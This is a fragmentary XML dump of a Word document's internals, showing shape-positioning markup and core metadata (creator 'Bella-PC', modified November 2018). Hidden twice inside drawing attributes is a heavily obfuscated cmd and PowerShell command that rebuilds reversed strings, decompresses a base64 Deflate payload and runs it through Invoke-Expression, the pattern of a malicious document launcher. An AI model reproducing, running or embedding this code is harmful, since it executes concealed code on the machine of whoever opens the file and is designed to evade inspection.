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AEEA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1685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7575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="210185" cy="11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MD /c Cmd.EXE /C"SEt   Mdal= ( [regEX]::MATcheS( ")''Nioj-'X'+]3,1[)(gNIrTsOT.eCNEreFErPEsOBrEv$ (.^| )93]raHc[,)99]raHc[+501]raHc[+58]raHc[( ecalperc-  63]raHc[,)89]raHc[+601]raHc[+221]raHc[(ecALPER- 421]raHc[,)001]raHc[+45]raHc[+98]raHc[(  ecALPER- )') '+'(Dn'+'Eo'+'tDA'+'e'+'R'+'.'+') '+'}'+' '+') iICS'+'a::]GNiDo'+'cne.TX'+'et[ , _bjz (r'+'E'+'DA'+'eR'+'mae'+'R'+'ts.oI'+' '+'Tcejb'+'o-'+'WEN{T'+'cejbO-hcAe'+'rOFd6Y )'+' '+'sseRPmocEd::]eDom'+'no'+'I'+'S'+'s'+'E'+'rPMOC.'+'N'+'OIs'+'S'+'e'+'rp'+'MoC.Oi.Metsy'+'S[ ,'+' )'+'c'+'iU==g'+'B'+'6T'+'X8ZDpQJ'+'luNy5FdT'+'+'+'s'+'QYRWw0a'+'H'+'a0'+'VPg'+'qKy5z'+'aMlMgl'+'JMqyOz'+'Xzl'+'Y'+'su'+'7M43rqia'+'mI'+'peS4XrZA'+'J1y'+'u'+'Y5R4'+'OuB0jq'+'1PBbbt'+'CcbdrZMa'+'5x'+'n+RTsc5'+'9a'+'RoFi9'+'x'+'34'+'PZVb'+'j'+'B1qWdsxzU'+'0comd'+'z'+'n5cM5'+'EEPhe'+'GwM'+'XQ'+'D2'+'/Pz6Rrd'+'f'+'z0cnH'+'4P'+'6'+'BiPQlJJ'+'NVI'+'E1K'+'X'+'Q'+'F'+'bWDF'+'ILTui'+'3rFcLBy'+'+M8RD8'+'O'+'D9Q'+'SOrI'+'3SAP'+'z'+'2evGd6PBR3dB'+'7Xr8'+'ivIci46'+'5aH'+'Yd'+'LBi'+'cZlc'+'I'+'Xsf'+'d'+'9Tf'+'C'+'r6lulJ'+'u'+'MoASHaVgOx'+'MZ7AVM'+'6T'+'m7'+'TKo9See'+'II812E'+'ciL0w'+'FVRQ0K'+'7Q'+'Ibxj'+'2'+'O7j'+'jUTK'+'Mt'+'3w9U'+'gMS/QocdzJYBD'+'12T'+'zJ'+'y'+'sz'+'5'+'z55vpxi'+'7urwRU2'+'2N'+'pDU2aAUNLe'+'Q'+'E'+'h'+'CxRH0HEaI6EHcj3S'+'QK2'+'8'+'S'+'Zf'+'VIExIgTd'+'DZ'+'RciU(gNirTs46EsAbm'+'ORF'+'::]TR'+'EV'+'noc'+'.MET'+'s'+'YS[ '+']maeRTs'+'YR'+'O'+'M'+'EM.Oi.M'+'eTsYS'+'[ (MAerTSetAL'+'fed.NO'+'iS'+'sERP'+'mOC.Oi.mEts'+'ys  Tcejbo-WEN ( )ci'+'UciUNio'+'J-'+'c'+'iUXciU+'+']'+'3,'+'1[)'+'E'+'CNeREFe'+'RP'+'eso'+'BrE'+'vbj'+'z]Gn'+'ir'+'ts[( '+'(. '((",'.', 'r'+'igHtto'+'leFT') -JOin '') ^| ^&amp;( $EnV:comSPeC[4,15,25]-JOiN'')&amp;&amp;POwErSheLl   ^&amp; ( \"{1}{0}\"-f'eX','i' ) ((  ^&amp; (  \"{1}{0}\"-f'iR','d' ) (\"{1}{0}{2}\" -f'dA','Env:m','L'  )).\"V`ALUe\"   )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-71.25pt;mso-position-vertical-relative:text;margin-left:-7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MD /c Cmd.EXE /C"SEt   Mdal= ( [regEX]::MATcheS( ")''Nioj-'X'+]3,1[)(gNIrTsOT.eCNEreFErPEsOBrEv$ (.^| )93]raHc[,)99]raHc[+501]raHc[+58]raHc[( ecalperc-  63]raHc[,)89]raHc[+601]raHc[+221]raHc[(ecALPER- 421]raHc[,)001]raHc[+45]raHc[+98]raHc[(  ecALPER- )') '+'(Dn'+'Eo'+'tDA'+'e'+'R'+'.'+') '+'}'+' '+') iICS'+'a::]GNiDo'+'cne.TX'+'et[ , _bjz (r'+'E'+'DA'+'eR'+'mae'+'R'+'ts.oI'+' '+'Tcejb'+'o-'+'WEN{T'+'cejbO-hcAe'+'rOFd6Y )'+' '+'sseRPmocEd::]eDom'+'no'+'I'+'S'+'s'+'E'+'rPMOC.'+'N'+'OIs'+'S'+'e'+'rp'+'MoC.Oi.Metsy'+'S[ ,'+' )'+'c'+'iU==g'+'B'+'6T'+'X8ZDpQJ'+'luNy5FdT'+'+'+'s'+'QYRWw0a'+'H'+'a0'+'VPg'+'qKy5z'+'aMlMgl'+'JMqyOz'+'Xzl'+'Y'+'su'+'7M43rqia'+'mI'+'peS4XrZA'+'J1y'+'u'+'Y5R4'+'OuB0jq'+'1PBbbt'+'CcbdrZMa'+'5x'+'n+RTsc5'+'9a'+'RoFi9'+'x'+'34'+'PZVb'+'j'+'B1qWdsxzU'+'0comd'+'z'+'n5cM5'+'EEPhe'+'GwM'+'XQ'+'D2'+'/Pz6Rrd'+'f'+'z0cnH'+'4P'+'6'+'BiPQlJJ'+'NVI'+'E1K'+'X'+'Q'+'F'+'bWDF'+'ILTui'+'3rFcLBy'+'+M8RD8'+'O'+'D9Q'+'SOrI'+'3SAP'+'z'+'2evGd6PBR3dB'+'7Xr8'+'ivIci46'+'5aH'+'Yd'+'LBi'+'cZlc'+'I'+'Xsf'+'d'+'9Tf'+'C'+'r6lulJ'+'u'+'MoASHaVgOx'+'MZ7AVM'+'6T'+'m7'+'TKo9See'+'II812E'+'ciL0w'+'FVRQ0K'+'7Q'+'Ibxj'+'2'+'O7j'+'jUTK'+'Mt'+'3w9U'+'gMS/QocdzJYBD'+'12T'+'zJ'+'y'+'sz'+'5'+'z55vpxi'+'7urwRU2'+'2N'+'pDU2aAUNLe'+'Q'+'E'+'h'+'CxRH0HEaI6EHcj3S'+'QK2'+'8'+'S'+'Zf'+'VIExIgTd'+'DZ'+'RciU(gNirTs46EsAbm'+'ORF'+'::]TR'+'EV'+'noc'+'.MET'+'s'+'YS[ '+']maeRTs'+'YR'+'O'+'M'+'EM.Oi.M'+'eTsYS'+'[ (MAerTSetAL'+'fed.NO'+'iS'+'sERP'+'mOC.Oi.mEts'+'ys  Tcejbo-WEN ( )ci'+'UciUNio'+'J-'+'c'+'iUXciU+'+']'+'3,'+'1[)'+'E'+'CNeREFe'+'RP'+'eso'+'BrE'+'vbj'+'z]Gn'+'ir'+'ts[( '+'(. '((",'.', 'r'+'igHtto'+'leFT') -JOin '') ^| ^&amp;( $EnV:comSPeC[4,15,25]-JOiN'')&amp;&amp;POwErSheLl   ^&amp; ( \"{1}{0}\"-f'eX','i' ) ((  ^&amp; (  \"{1}{0}\"-f'iR','d' ) (\"{1}{0}{2}\" -f'dA','Env:m','L'  )).\"V`ALUe\"   )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12:00Z</dcterms:created>
  <dc:creator>Bella-PC</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-12T12:12:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>